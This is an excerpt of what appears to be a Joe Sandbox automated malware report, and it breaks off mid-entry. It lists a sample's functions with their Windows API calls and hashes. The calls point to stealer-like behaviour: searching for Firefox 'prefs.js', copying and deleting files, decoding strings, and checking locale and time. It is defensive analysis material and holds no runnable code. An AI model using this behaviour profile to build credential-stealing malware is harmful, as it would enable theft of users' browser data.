                        • Instruction Fuzzy Hash: 5F5173B6900218BBDB24FBF0DC84EEE737DBB44304F4085C8A689A6140EB75A785CF95
                        APIs
                        • wsprintfA.USER32 ref: 0040ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                        • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 30246f1004ec411d292ebd34bd79ad3755d048ed616028282090bc1055ed864b
                        • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                        • Opcode Fuzzy Hash: 30246f1004ec411d292ebd34bd79ad3755d048ed616028282090bc1055ed864b
                        • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: 4@$\*.*
                        • API String ID: 2325840235-1993203227
                        • Opcode ID: 50afc4e36d77e581407f3191a6a3500e24fa763b594c381bdeb7cacfe856dda6
                        • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                        • Opcode Fuzzy Hash: 50afc4e36d77e581407f3191a6a3500e24fa763b594c381bdeb7cacfe856dda6
                        • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 10403bee3d1061313c64fe9f4d720eb9e0ce2a9776297448fff9497b866f2e39
                        • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                        • Opcode Fuzzy Hash: 10403bee3d1061313c64fe9f4d720eb9e0ce2a9776297448fff9497b866f2e39
                        • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                        • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                        • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                        • FindClose.KERNEL32(000000FF), ref: 00401E32
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 9c6aaf26391f4c563266a8cc5a8ee762c18988f76758305471b50301855c95f9
                        • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                        • Opcode Fuzzy Hash: 9c6aaf26391f4c563266a8cc5a8ee762c18988f76758305471b50301855c95f9
                        • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                        APIs
                        • wsprintfA.USER32 ref: 040AEFA5
                        • FindFirstFileA.KERNEL32(?,?), ref: 040AEFBC
                        • StrCmpCA.SHLWAPI(?,00421538), ref: 040AF012
                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 040AF028
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040AF515
                        • FindClose.KERNEL32(000000FF), ref: 040AF52A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID:
                        • API String ID: 180737720-0
                        • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                        • Instruction ID: 9b858bbe22bc2735ce53fd322bc0f327d61c800a3e4ed5c2cdc69d6abb6591d1
                        • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                        • Instruction Fuzzy Hash: F0E12272A112189AEB68FB64DD50EEE7339AF54208F4041D9B18A72091EF347FC9CF95
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 20d38ecc57deb3d9438d43c255bd77c074e8988a0e7323bbf35c3da253216f35
                        • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                        • Opcode Fuzzy Hash: 20d38ecc57deb3d9438d43c255bd77c074e8988a0e7323bbf35c3da253216f35
                        • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 040ADD52
                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 040ADD9A
                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 040ADDB0
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040AE033
                        • FindClose.KERNEL32(000000FF), ref: 040AE045
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                        • Instruction ID: ce0c4019c1cdea9c8d7122a511e8840f782698eedd4be9e807e57a866fd860b6
                        • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                        • Instruction Fuzzy Hash: 97918572A002049BDB14FBB4DD55DEE7379AF95308F00465CA48AB6544EF38BB188FE5
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 040AF985
                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 040AF9D6
                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 040AF9EC
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040AFD18
                        • FindClose.KERNEL32(000000FF), ref: 040AFD2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                        • Instruction ID: 8933b7e1816340df3d6d196d0a675468ba389537a904095552b0bf0aa01b6acf
                        • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                        • Instruction Fuzzy Hash: DEB16171A102189BDB24FFA4DD94EEE7379AF94308F0081A9D48AA6150EF347B49CFD5
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*$@
                        • API String ID: 433455689-2355794846
                        • Opcode ID: 8f144413de28821d8ed2cdbfb72baf9137ae42be297c9f4de77e82f8f978c612
                        • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                        • Opcode Fuzzy Hash: 8f144413de28821d8ed2cdbfb72baf9137ae42be297c9f4de77e82f8f978c612
                        • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 040A1B8A
                        • StrCmpCA.SHLWAPI(?,00425264), ref: 040A1BDA
                        • StrCmpCA.SHLWAPI(?,0042530C), ref: 040A1BF0
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040A1FA7
                        • DeleteFileA.KERNEL32(00000000), ref: 040A2031
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040A2087
                        • FindClose.KERNEL32(000000FF), ref: 040A2099
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID:
                        • API String ID: 1415058207-0
                        • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                        • Instruction ID: 8a3f358e0cfe917dc803978de925ca6459220da8619555a9fc4783fda7f20b27
                        • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                        • Instruction Fuzzy Hash: 26120C71A10218ABDB29FB64CD94EEE7379AF5430CF444199A14A76090EF747F88CFA4
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 040AE0C5
                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 040AE115
                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 040AE12B
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040AE647
                        • FindClose.KERNEL32(000000FF), ref: 040AE659
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID:
                        • API String ID: 2325840235-0
                        • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                        • Instruction ID: 2d8cbb76edf5636da9ecf522109a05480716f5a0a3bf4558514d462ad855bbcd
                        • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                        • Instruction Fuzzy Hash: 93F1E171A102189ADB29FB64DD94EEE7379AF5430CF4441DAA09A72091EF347F88CF94
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                        • LocalFree.KERNEL32(00000000), ref: 00417D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: f793b8f56b8d187460904af65bf855dbf7dc4249980a78512ab563ebf14e2e71
                        • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                        • Opcode Fuzzy Hash: f793b8f56b8d187460904af65bf855dbf7dc4249980a78512ab563ebf14e2e71
                        • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                        APIs
                        • memset.MSVCRT ref: 0040C853
                        • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,024D9C30), ref: 0040C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                        • memcpy.MSVCRT(?,?,?), ref: 0040C912
                        • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                        • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                        • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                        • String ID:
                        • API String ID: 1498829745-0
                        • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                        • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                        • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                        • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                        APIs
                        • memset.MSVCRT ref: 040ACABA
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 040ACAD8
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 040ACAE3
                        • memcpy.MSVCRT(?,?,?), ref: 040ACB79
                        • lstrcat.KERNEL32(?,00420B46), ref: 040ACBAA
                        • lstrcat.KERNEL32(?,00420B47), ref: 040ACBBE
                        • lstrcat.KERNEL32(?,00420B4E), ref: 040ACBDF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                        • String ID:
                        • API String ID: 1498829745-0
                        • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                        • Instruction ID: e037ae8f69bed60fd82e7d80fee07e79f4c158e6b807807b161f06d6cb35b8fe
                        • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                        • Instruction Fuzzy Hash: 3A418278944219EFDB10DFD0DC88BEEBBB9BB44304F1045A8E509A6280D7756B84CF91
                        APIs
                        • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,024A5C80,?,0042110C,?,00000000,?), ref: 0041696C
                        • sscanf.NTDLL ref: 00416999
                        • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,024A5C80,?,0042110C), ref: 004169B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,024A5C80,?,0042110C), ref: 004169C0
                        • ExitProcess.KERNEL32 ref: 004169DA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
